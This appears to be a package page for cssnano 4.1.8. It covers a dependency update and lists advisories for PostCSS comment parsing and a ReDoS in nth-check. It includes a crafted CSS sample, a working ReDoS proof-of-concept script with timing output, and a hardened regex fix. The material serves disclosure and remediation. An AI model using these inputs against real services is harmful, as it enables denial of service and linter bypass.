Cssnano is a powerful tool for minifying CSS, built upon the PostCSS ecosystem, enabling developers to optimize their stylesheets for production. Version 4.1.8 brings subtle but important enhancements over its predecessor, 4.1.7, mainly in its dependencies. The key update is the dependency cssnano-preset-default, which moved from version 4.0.5 to 4.0.6. This preset encapsulates the default set of optimizations cssnano applies, so developers should expect potentially different and improved minification results compared to the previous version. While core dependencies such as postcss and cosmiconfig remain unchanged, the change in the preset indicates refinements in the default minification strategy. The unpacked size also decreased slightly, from 28196 to 28053; this is negligible and has no bearing on usage.
For developers considering an upgrade, this means reviewing how the new default preset affects their CSS. Although the update is minor, the refinements in the default preset may reduce CSS output size and thereby improve website performance. Consider testing the new version in a staging environment to confirm compatibility with existing styles and build processes. In short, version 4.1.8 offers developers a refined and potentially more efficient way to optimize their CSS stylesheets for production environments.
All vulnerabilities related to version 4.1.8 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite having originally been inside a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  // "2n" followed by a long run of spaces and a final character the formula grammar rejects
  var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str)
  }
  catch (err) {
    // nth-check throws on the malformed formula; the time taken to reach the throw is what grows
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
  }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
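To show why the quoted sub-pattern backtracks badly and how a maintainer or consumer can check a fix, here is an added example that is not part of the advisory or of nth-check's source: the page's sub-pattern is wrapped in an assumed anchored "an+b" matcher (VULNERABLE_RE), placed beside an illustrative rewrite (HARDENED_RE) that removes the overlapping whitespace quantifiers; parseWith and timeReject are this example's own helpers.

```javascript
// Added illustration, not nth-check's own source. The advisory quotes the
// sub-pattern \s*(?:([+-]?)\s*(\d+))?; the anchored "an+b" wrapper around it
// below is an assumption made for this example.
//
// Two \s* runs separated only by an optional sign can split one run of spaces
// in O(n) ways; when the overall match fails (here on a trailing "!"), every
// split is retried, so rejection cost grows quadratically with the spaces,
// which is the growth the PoC output above shows.
const VULNERABLE_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

// Hardened rewrite (also this example's own): the second \s* is reachable only
// after a mandatory sign, so each space has exactly one possible owner and a
// failing match backtracks in O(n) while accepting the same formulas.
const HARDENED_RE = /^([+-]?\d*n)?\s*(?:([+-])\s*(\d+)|(\d+))?$/;

// Parse an "an+b" formula with the given pattern; returns {a, b} or null.
function parseWith(re, formula) {
  const m = re.exec(formula);
  if (m === null) return null;
  const digits = m[3] !== undefined ? m[3] : m[4]; // group index differs per regex
  if (m[1] === undefined && digits === undefined) return null; // reject ""
  let a = 0;
  if (m[1] !== undefined) {
    const coeff = m[1].slice(0, -1); // strip the trailing "n"
    a = coeff === "" || coeff === "+" ? 1 : coeff === "-" ? -1 : parseInt(coeff, 10);
  }
  const sign = m[2] === "-" ? -1 : 1;
  const b = digits === undefined ? 0 : sign * parseInt(digits, 10);
  return { a, b };
}

// Build the PoC's input shape ("2n" + spaces + "!") and time its rejection.
function timeReject(re, spaces) {
  const formula = "2n" + " ".repeat(spaces) + "!";
  const start = Date.now();
  const result = parseWith(re, formula);
  return { rejected: result === null, ms: Date.now() - start };
}

// Both patterns agree on well-formed and malformed formulas (constructed samples)...
for (const f of ["2n+1", "2n + 1", "-n-3", "n", "3", "- 3", "2n+"]) {
  console.log(JSON.stringify(f), parseWith(VULNERABLE_RE, f), parseWith(HARDENED_RE, f));
}
// ...but only the vulnerable one slows down quadratically on the malformed input.
for (const spaces of [2000, 4000, 8000]) {
  console.log(spaces, "spaces:", timeReject(VULNERABLE_RE, spaces).ms, "ms vs",
              timeReject(HARDENED_RE, spaces).ms, "ms");
}
```

A regression test for a fix of this kind should assert equal parse results on a corpus of formulas plus a bounded rejection time on the padded input, rather than relying on timing alone.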